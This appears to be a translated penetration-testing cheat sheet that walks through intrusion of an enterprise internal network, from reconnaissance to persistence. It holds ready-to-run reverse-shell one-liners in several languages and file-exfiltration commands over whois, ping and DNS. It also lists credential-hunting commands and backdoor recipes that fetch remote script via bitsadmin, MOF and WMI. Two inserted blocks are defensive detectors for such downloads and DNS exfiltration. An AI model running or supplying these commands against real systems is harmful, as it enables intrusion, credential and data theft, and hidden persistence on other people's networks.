[Internal Network Penetration] A summary of the overall approach and exploitation methods
In day-to-day internal network penetration, the overall approach and methods should be:
- Information gathering: open-source intelligence collection; building an enterprise password dictionary
- Getting into the internal network: via weak enterprise accounts; via system vulnerabilities; via web application penetration
- Covert attack: Command and Control; proxies
- Cross-boundary applications inside the network: cross-boundary port forwarding; cross-boundary proxy tunnelling; reverse shells, etc.
- Internal network information gathering: local host information gathering; lateral information gathering
- Privilege escalation: Windows; Linux
- Persistence: system backdoors; web backdoors
- Lateral movement: port-based penetration; domain penetration
- Covering tracks: clearing Windows logs; disabling Windows logging, etc.
Following this route, today we walk through, step by step, what each stage involves in practice. (Take notes...)
0x00 Information gathering
Open-source intelligence gathering (OSINT)
GitHub
- Github_Nuggests (automatically crawls GitHub for sensitive information leaked in files): https://github.com/az0ne/Github_Nuggests
- GSIL (near-real-time (within 15 minutes) discovery of information leaked on GitHub): https://github.com/FeeiCN/GSIL
- x-patrol (from the Xiaomi team): https://github.com/MiSecurity/x-patrol
WHOIS lookup / registrant reverse lookup / e-mail reverse lookup / related assets
- 站長之家 (ChinaZ): http://whois.chinaz.com/?DomainName=target.com&ws=
- 愛站 (Aizhan): https://whois.aizhan.com/target.com/
- 微步在線 (ThreatBook): https://x.threatbook.cn/
- IP reverse lookup: https://dns.aizhan.com/
- 天眼查 (Tianyancha): https://www.tianyancha.com/
- 虎媽查: http://www.whomx.com/
- Historical vulnerability lookup: online: http://wy.zone.ci/ ; self-hosted: https://github.com/hanc00l/wooyun_publi/
Google hacking
Building an enterprise password dictionary
Dictionary lists
- passwordlist: https://github.com/lavalamp-/password-lists
- 豬豬俠's dictionary: https://pan.baidu.com/s/1dFJyedz
- Blasting_dictionary (shares and collects assorted dictionaries: weak passwords, common passwords, directory brute forcing, database, editor and admin-panel brute forcing, etc.)
- For a specific vendor, focus on building a dictionary around the vendor's domain names, using templates such as the following (%pwd% and %user% are placeholders):
['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']
Password generation
- GenpAss (weak-password generator with Chinese characteristics): https://github.com/RicterZ/genpAss/
- passmaker (password dictionary generator with customisable rules): https://github.com/bit4woo/passmaker
- pydictor (powerful password generator): https://github.com/LandGrey/pydictor
Obtaining e-mail address lists
- theHarvester: https://github.com/laramies/theHarvester
- Once you have one mailbox, export its address book
- LinkedInt: https://github.com/mdsecactivebreach/LinkedInt
- Mailget: https://github.com/Ridter/Mailget
Leaked password lookup
- ghostproject: https://ghostproject.fr/
- pwndb: https://pwndb2am4tzkvold.onion.to/
Gathering information about the enterprise's external-facing assets
Subdomain enumeration
- Layer 子域名挖掘機 4.2 commemorative edition
- subDomainsBrute: https://github.com/lijiejie/subDomainsBrute
- wydomain: https://github.com/ring04h/wydomain
- Sublist3r: https://github.com/aboul3la/Sublist3r
- site:target.com on https://www.google.com
- GitHub code repositories
- Capture traffic and analyse request/response values (redirects / file uploads / app / API endpoints, etc.)
- Online lookup sites such as 站長幫手 links
- DNS zone transfer vulnerability
Linux
dig @ns.example.com example.com AXFR
Windows
nslookup -type=ns xxx.yyy.cn   # query which DNS servers are authoritative for the domain
nslookup                       # enter nslookup interactive mode
server dns.domian.com          # choose the DNS server to query
ls xxx.yyy.cn                  # list the domain's records
- GetDomainsBySSL.py: https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&type=note#/
- censys.io certificates: https://censys.io/certificates?q=target.com
- crt.sh certificate search: https://crt.sh/?q=%25.target.com
- Shodan: https://www.shodan.io/
- ZoomEye: https://www.zoomeye.org/
- FOFA: https://fofa.so/
- Censys: https://censys.io/
- dnsdb.io: https://dnsdb.io/zh-cn/search?q=target.com
- api.hackertarget.com: http://api.hackertarget.com/reversedns/?q=target.com
- community.riskiq.com: https://community.riskiq.com/Search/target.com
- subdomain3: https://github.com/yanxiu0614/subdomain3
- FuzzDomain: https://github.com/Chora10/FuzzDomain
- dnsdumpster.com: https://dnsdumpster.com/
- phpinfo.me: https://phpinfo.me/domain/
- Open DNS data API: https://dns.bufferover.run/dns?q=baidu.com
0x01 Getting into the internal network
Via weak enterprise accounts
- VPN (VPN credentials obtained via e-mail, password brute forcing, social engineering, etc.)
- Enterprise operations systems (Zabbix, etc.)
Via system vulnerabilities
- Metasploit (exploitation framework): https://github.com/rapid7/metasploit-framework
- Exploit scripts
Web application penetration
- SQL injection
- Cross-site scripting (XSS)
- Cross-site request forgery (CSRF)
- SSRF (ssrf_proxy)
- Functional / business-logic flaws
- Other vulnerabilities
- CMS (content management system) vulnerabilities
- Enterprise self-hosted proxies
Wireless (Wi-Fi) access
Covert attack
Command and Control
- ICMP: https://pentestlab.blog/2017/07/28/command-and-control-icmp/
- DNS: https://pentestlab.blog/2017/09/06/command-and-control-dns/
- DropBox: https://pentestlab.blog/2017/08/29/command-and-control-dropbox/
- Gmail: https://pentestlab.blog/2017/08/03/command-and-control-gmail/
- Telegram: http://drops.xmd5.com/static/drops/tips-16142.html
- Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/
- Website Keyword: https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/
- PowerShell: https://pentestlab.blog/2017/08/19/command-and-control-powershell/
- Windows COM: https://pentestlab.blog/2017/09/01/command-and-control-windows-com/
- WebDAV: https://pentestlab.blog/2017/09/12/command-and-control-webdav/
- Office 365: https://www.anquanke.com/post/id/86974
- HTTPS: https://pentestlab.blog/2017/10/04/command-and-control-https/
- Kernel: https://pentestlab.blog/2017/10/02/command-and-control-kernel/
- Website: https://pentestlab.blog/2017/11/14/command-and-control-website/
- WMI: https://pentestlab.blog/2017/11/20/command-and-control-wmi/
- WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket/
- Images: https://pentestlab.blog/2018/01/02/command-and-control-images/
- Web Interface: https://pentestlab.blog/2018/01/03/command-and-control-web-interface/
- JavaScript: https://pentestlab.blog/2018/01/08/command-and-control-javascript/
- ...
Fronting
- Domain Fronting
- Tor Fronting
Proxies
- VPN
- shadowsocks: https://github.com/shadowsocks
- HTTP: http://cn-proxy.com/
- Tor
0x02 Cross-boundary applications inside the network
1. Cross-boundary port forwarding
- NC port forwarding: https://blog.csdn.net/l_f0rm4t3d/article/details/24004555
- LCX port forwarding: http://blog.chinaunix.net/uid-53401-id-4407931.html
- nps (personally I find it fairly stable): https://github.com/cnlh/nps
- frp: https://github.com/fatedier/frp
- Proxy scripts: Tunna https://github.com/SECFORCE/Tunna ; reDuh https://github.com/sensepost/reDuh ...
2. Cross-boundary proxy tunnelling
EW:
https://rootkiter.com/EarthWorm/
Forward SOCKS v5 server:
./ew -s ssocksd -l 1080
Reverse SOCKS v5 server:
a) First, on host A, which has a public IP, run:
$ ./ew -s rcsocks -l 1080 -e 8888
b) On target host B, start the SOCKS v5 service and connect it back to port 8888 of the public host:
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
Multi-level chaining
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
Usage of lcx_tran
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
Usage of lcx_listen and lcx_slave
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
A local SOCKS test case for "three-level chaining", for reference:
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
Termite (pivot host)
https://rootkiter.com/Termite/
Usage notes: https://rootkiter.com/Termite/README.txt
Proxy scripts
reGeorg: https://github.com/sensepost/reGeorg
Reverse shells
bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
nc
# with -e
nc -e /bin/sh 223.8.200.234 1234
# without -e
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Transferring and downloading files inside the internal network
wput
wput dir_name ftp://linuxpig:123456@host.com/
wget
wget http://site.com/1.rar -O 1.rar
aria2c (needs to be installed)
aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
PowerShell
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file","C:\%homepath%\file")
VBS script
Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 ' binary stream
    .open
    .write xHttp.responseBody
    .savetofile "C:\%homepath%\file", 2 ' overwrite if the file exists
end with
Run: cscript test.vbs
Perl
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");
Run: perl test.pl
Python (2.x)
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'wb')
localFile.write(u.read())
localFile.close()
Run: python test.py
Ruby
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  open("save_location", "wb") { |file|
    file.write(r.body)
  }
}
Run: ruby test.rb
PHP
<?php
$url = 'http://www.example.com/file';
$path = '/path/to/file';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
file_put_contents($path, $data);
?>
Run: php test.php
NC
On the attacker side:
cat file | nc -l 1234
On the target:
nc host_ip 1234 > file
FTP
ftp 127.0.0.1
username
password
get file
exit
TFTP
tftp -i host GET C:\%homepath%\file location_of_file_on_tftp_server
Bitsadmin
bitsadmin /transfer n http://domain/file c:\%homepath%\file
Windows file share
net use x: \\127.0.0.1\share /user:example.com\userID myPassword
SCP
Local to remote:
scp file user@host.com:/tmp
Remote to local:
scp user@host.com:/tmp file
rsync
Copy files from a remote rsync server to the local machine:
rsync -av root@192.168.78.192::www /databack
Copy local files to a remote rsync server:
rsync -av /databack root@192.168.78.192::www
certutil.exe
certutil.exe -urlcache -split -f http://site.com/file
copy
copy \\IP\ShareName\file.exe file.exe
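From the defender's side, the Windows download methods listed above (certutil -urlcache, bitsadmin /transfer, PowerShell WebClient) are all native binaries that rarely fetch URLs in normal use, so their command lines are a cheap detection signal. The following is an added example, not code from the original page: a small rule set run over constructed process-creation records (the field shape mirrors Sysmon event 1 / Security 4688, but the records themselves are made up).

```python
"""Flag native Windows binaries used to download files, from process-creation records.

Added example for this write-up, not code from the original page. Records are
constructed; only the image name and command line are inspected.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample records (image + command line), not real telemetry
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "corp\\alice", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://site.example/file payload.bin"},
    {"host": "WS01", "user": "corp\\alice", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify cert.cer"},
    {"host": "WS02", "user": "corp\\bob", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer n http://domain.example/file c:\\users\\bob\\file"},
    {"host": "WS03", "user": "corp\\carol",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -c \"(New-Object System.Net.WebClient)"
                ".DownloadFile('http://domain.example/file','C:\\t\\file')\""},
    {"host": "WS03", "user": "corp\\carol",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Process"},
    {"host": "WS04", "user": "corp\\dave", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": "cscript test.vbs"},
]

# (image name, pattern over the command line, finding description)
RULES = [
    ("certutil.exe", re.compile(r"-urlcache\b.*\s-f\s+https?://", re.I),
     "certutil URL download (-urlcache -f)"),
    ("bitsadmin.exe", re.compile(r"/transfer\b.*https?://", re.I),
     "bitsadmin /transfer download"),
    ("powershell.exe",
     re.compile(r"(Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b)", re.I),
     "PowerShell web download"),
]


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str


def image_name(path: str) -> str:
    """Last path component, lower-cased, so rules match regardless of install path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_downloads(events) -> list[Finding]:
    """Return one Finding per record whose image and command line match a rule."""
    findings = []
    for ev in events:
        name = image_name(ev["image"])
        for binary, pattern, desc in RULES:
            if name == binary and pattern.search(ev["cmdline"]):
                findings.append(Finding(ev["host"], ev["user"], desc, ev["cmdline"]))
    return findings


if __name__ == "__main__":
    for f in detect_downloads(SAMPLE_EVENTS):
        print(f"{f.host} {f.user}: {f.rule} :: {f.cmdline}")
```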
WHOIS
Receiver, Host B:
nc -vlnp 1337 | sed "s/ //g" | base64 -d
Sender, Host A:
whois -h host_ip -p 1337 `cat /etc/passwd | base64`
WHOIS + TAR
First:
ncat -k -l -p 4444 | tee files.b64   # tee to a file so you can make sure you have it
Next:
tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits
Finally:
cat files.b64 | tr -d '\r' | base64 -d | tar zxv   # to get the files out
PING
Sender:
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
Receiver, ping_receiver.py:
import sys
try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)

def process_packet(pkt):
    # Each echo request carries one 4-byte chunk as its ping pattern; the pattern
    # repeats across the payload, so the last 4 bytes are one complete chunk
    if pkt.haslayer(ICMP) and pkt[ICMP].type == 8:
        data = pkt[ICMP].load[-4:]
        print(data.decode("utf-8", errors="replace"), flush=True, end="")

sniff(iface="eth0", prn=process_packet)
Run: python3 ping_receiver.py
DIG
Sender:
xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done
Receiver, dns_reciver.py:
import sys
try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)

def process_packet(pkt):
    if pkt.haslayer(DNS) and pkt.haslayer(DNSQR):
        domain = pkt[DNS][DNSQR].qname.decode('utf-8')   # e.g. "<hex chunk>.gooogle.com."
        root_domain = domain.split('.')[1]
        if root_domain.startswith('gooogle'):
            # strip the 13-character ".gooogle.com." suffix and decode the hex chunk
            print(bytearray.fromhex(domain[:-13]).decode("utf-8", errors="replace"), flush=True, end='')

sniff(iface="eth0", prn=process_packet)
Run: python3 dns_reciver.py
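The dig loop above turns a file into a stream of queries whose leftmost label is a long hex string under one parent domain, which is exactly the shape a resolver-log review can catch. Below is an added detection example, not code from the original page: it groups hex-labelled queries per (client, parent domain), reports flows with several chunks and reassembles a decoded preview so an analyst can confirm what was sent. The log lines and payload chunks are constructed.

```python
"""Detect hex-encoded DNS exfiltration of the kind the dig loop above produces.

Added example for this write-up (not code from the original page or its tools):
every query whose leading labels are one long hex string is treated as a chunk,
chunks are grouped per (client, parent domain), and a flow with several chunks
is reported together with a decoded preview. Log lines and chunks are constructed.
"""
from __future__ import annotations

import re
from collections import defaultdict

HEX_LABEL = re.compile(r"^[0-9a-f]+$", re.I)

# Constructed payload chunks, mirroring what `xxd -p -c 31` would emit for a passwd file
CHUNKS = [
    b"root:x:0:0:root:/root:/bin/bash",
    b"\ndaemon:x:1:1:daemon:/usr/sbin:",
    b"/usr/sbin/nologin\n",
]

# Constructed resolver log in "<timestamp> <client_ip> <qname>" form
SAMPLE_LOG = [
    "2024-05-01T09:00:01 10.0.0.5 www.example.com.",
    *[f"2024-05-01T09:00:0{i + 2} 10.0.0.5 {chunk.hex()}.gooogle.com."
      for i, chunk in enumerate(CHUNKS)],
    "2024-05-01T09:00:09 10.0.0.7 a1b2c3.cdn.example.net.",
    "2024-05-01T09:00:10 10.0.0.7 mail.example.com.",
]


def parse_line(line: str) -> tuple[str, str, str]:
    """Split one log line into (timestamp, client, normalised qname)."""
    ts, client, qname = line.split()
    return ts, client, qname.rstrip(".").lower()


def encoded_chunk(qname: str, min_hex_len: int = 16) -> tuple[str, str] | None:
    """Return (parent_domain, hex_data) when every leading label is hex, else None.

    A short hex-looking host such as 'a1b2c3' stays below min_hex_len, and a
    name like 'a1b2c3.cdn.example.net' is rejected because 'cdn' is not hex.
    """
    labels = qname.split(".")
    leading, parent = labels[:-2], ".".join(labels[-2:])
    if not leading or not all(HEX_LABEL.match(label) for label in leading):
        return None
    data = "".join(leading)
    if len(data) < min_hex_len or len(data) % 2:
        return None
    return parent, data


def find_exfil(lines, min_queries: int = 2) -> dict:
    """Group encoded chunks per (client, parent) and report flows with enough of them."""
    flows = defaultdict(list)
    for line in lines:
        _, client, qname = parse_line(line)
        hit = encoded_chunk(qname)
        if hit:
            parent, data = hit
            flows[(client, parent)].append(data)
    alerts = {}
    for key, chunks in flows.items():
        if len(chunks) >= min_queries:
            raw = bytes.fromhex("".join(chunks))   # reassemble in arrival order
            alerts[key] = {
                "queries": len(chunks),
                "bytes": len(raw),
                "preview": raw[:40].decode("utf-8", "replace"),
            }
    return alerts


if __name__ == "__main__":
    for (client, parent), info in find_exfil(SAMPLE_LOG).items():
        print(f"{client} -> *.{parent}: {info['queries']} queries, "
              f"{info['bytes']} bytes: {info['preview']!r}")
```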
Setting up an HTTP server
python2
python -m SimpleHTTPServer 1337
python3
python -m http.server 1337
PHP 5.4+
php -S 0.0.0.0:1337
ruby
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'
ruby -run -e httpd . -p 1337
Perl
perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'
busybox httpd
busybox httpd -f -p 8000
0x03 Internal network information gathering
1. Local host information gathering
1. User list
Windows user list; analyse mail users: internal [domain] mail users are usually internal [domain] users
2. Process list
Analyse antivirus / security monitoring tools, mail clients, VPN, FTP clients, etc.
3. Service list
Services related to security tooling [check whether they can be switched off manually, etc.]; problematic services [permissions/vulnerabilities]
4. Port list
Common services/applications on the open ports [anonymous access/permissions/vulnerabilities, etc.]; use the ports for further information gathering
5. Patch list
Analyse Windows patches; vulnerabilities in third-party software [Java/Oracle/Flash, etc.]
6. Local shares
Local share list/access rights; domain shares accessed from this host/access rights
7. Analysis of the current user's habits
History, bookmarks, documents, etc.
8. Tools for obtaining the current user's password
Windows
- mimikatz: https://github.com/gentilkiwi/mimikatz
- wce: https://github.com/vergl4s/pentesting-dump/tree/master/net/Windows/wce_v1_42beta_x64
- Invoke-WCMDump: https://github.com/peewpw/Invoke-WCMDump
- mimiDbg: https://github.com/giMini/mimiDbg
- LaZagne: https://github.com/AlessandroZ/LaZagne
- nirsoft_package: http://launcher.nirsoft.net/downloads/
- QuarksPwDump: https://github.com/quarkslab/quarkspwdump
- fgdump
- Password-field (asterisk) revealers, etc.
Linux
- LaZagne: https://github.com/AlessandroZ/LaZagne
- mimipenguin: https://github.com/huntergregal/mimipenguin
2. Lateral information gathering
Port scanning
Common port scanning tools
- nmap: https://nmap.org
- masscan: https://github.com/robertdavidgraham/masscan
- zmap: https://github.com/zmap/zmap
- s scanner
- Self-written scripts, etc.
- NC
- ...
Internal network topology analysis
DMZ, management network, production network, test network
Common information-gathering commands
ipconfig:
ipconfig /all ------> find the local IP range, the domain the host belongs to, etc.
net:
net user ------> local user list
net localgroup administrators ------> local administrators [usually includes domain users]
net user /domain ------> query domain users
net group /domain ------> query the groups in the domain
net group "domain admins" /domain ------> query the Domain Admins group
net localgroup administrators /domain ------> domain administrators who have logged on to this host
net localgroup administrators workgroup\user001 /add ------> add a domain user to the local administrators group
net group "Domain controllers" ------> view the domain controllers (there may be several)
net view ------> list the machines in the same domain
net view /domain ------> list the domains
net view /domain:domainname ------> list the machines in a given domain
dsquery
dsquery computer domainroot -limit 65535 && net group "domain computers" /domain ------> list all machine names in the domain
dsquery user domainroot -limit 65535 && net user /domain ------> list all user names in the domain
dsquery subnet ------> list the subnets defined in the domain
dsquery group && net group /domain ------> list the groups in the domain
dsquery ou ------> list the organizational units in the domain
dsquery server && net time /domain ------> list the domain controllers
Third-party information gathering: NETBIOS information gathering, SMB information gathering, null-session information gathering, vulnerability information gathering, etc.
0x04 Privilege escalation
1. Windows
BypassUAC
Common methods
- Use the IFileOperation COM interface
- Use the extract option of Wusa.exe
- Remotely inject shellcode into a puppet process
- DLL hijacking: hijack system DLL files
- eventvwr.exe and registry hijacking
- sdclt.exe
- SilentCleanup
- wscript.exe
- cmstp.exe
- Modify environment variables to hijack high-privilege .NET programs
- Modify the registry under HKCU\Software\Classes\CLSID to hijack high-privilege programs
- Escalate straight past UAC
Common tools
- UACME: https://github.com/hfiref0x/UACME
- Bypass-UAC: https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC
- Yamabiko: https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC/Yamabiko
- ...
Privilege escalation
- Windows kernel exploit privilege escalation
Detection: Windows-Exploit-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester ; WinSystemHelper: https://github.com/brianwrf/WinSystemHelper ; wesng: https://github.com/bitsadmin/wesng
Exploitation: windows-kernel-exploits: https://github.com/SecWiki/windows-kernel-exploits ; BeRoot: https://github.com/AlessandroZ/BeRoot
- Service privilege escalation
Database services, FTP services, etc.
- Windows misconfigurations
- Weak permission configuration on system services
- Insecure registry permissions
- Insecure file/folder permissions
- Scheduled tasks
- Any user can install MSI packages with NT AUTHORITY\SYSTEM privileges
- Privilege-escalation scripts
PowerUp: https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1
ElevateKit: https://github.com/rsmudge/ElevateKit
2. Linux
Kernel overflow privilege escalation
linux-kernel-exploits: https://github.com/SecWiki/linux-kernel-exploits
Scheduled tasks
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
SUID
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
Weak permission configuration on system services
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
Insecure file/folder permissions
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
Finding stored plaintext usernames and passwords
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla
0x05 Persistence
1. System backdoors
Windows
1. Password-logging tools
- WinlogonHack: a tool for capturing remote (3389) logon passwords. Before WinlogonHack there was a Gina trojan, used mainly to capture passwords on Windows 2000; WinlogonHack targets Windows XP and Windows 2003 Server.
- Keylogger: the purpose of installing a keylogger is not only to record the local password but every password the administrator types, such as mailbox and web passwords, which yields a lot of information about the administrator.
- NTPass: obtains the administrator password, normally via the GINA method; on some machines software such as pcAnywhere makes remote logon fail, and this tool captures the password without that problem.
- Linux OpenSSH backdoor: a recompiled sshd service that records users' logon passwords.
2. Common places to store a payload
WMI
Store:
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('Command' , $Payload)
$StaticClass.Put()
Read:
$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value
Digitally signed PE files: abuse the flaw in the file-hash algorithm to hide a payload inside a PE file without breaking its digital signature
Special ADS names ...
type putty.exe > ...:putty.exe
wmic process call create c:\test\ads\...:putty.exe
Special COM file names
type putty.exe > \\.\C:\test\ads\COM1:putty.exe
wmic process call create \\.\C:\test\ads\COM1:putty.exe
Drive root
type putty.exe > C:\:putty.exe
wmic process call create C:\:putty.exe
3. Run/RunOnce keys
User level
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Administrator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
4. BootExecute key
Because smss.exe starts before the Windows subsystem is loaded, it calls the configuration subsystem to load the current configuration hives; the relevant registry keys are:
HKLM\SYSTEM\CurrentControlSet\Control\hivelist
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager
5. Userinit key
Login scripts loaded by the WinLogon process; the key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
6. Startup keys
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
7. Services
Create a service
sc create [ServerName] binPath= BinaryPathName
8. Browser Helper Objects
Essentially DLL modules loaded when Internet Explorer starts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
9. AppInit_DLLs
DLLs loaded whenever User32.dll is loaded
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
10. File associations
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_CLASSES_ROOT
11. bitsadmin (http://www.liuhaihua.cn/archives/357579.html)
bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://host.com/calc.sct scrobj.dll"
bitsadmin /Resume backdoor
12. MOF (https://evi1cg.me/archives/Powershell_MOF_Backdoor.html)
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP1";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 1";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consP1";
    ScriptingEngine = "JScript";
    ScriptText = "GetObject(\"script:https://host.com/test\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
Run as administrator:
mofcomp test.mof
13. WMI
https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/
Runs notepad.exe every 60 seconds
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
14. Userland persistence with scheduled tasks
https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/
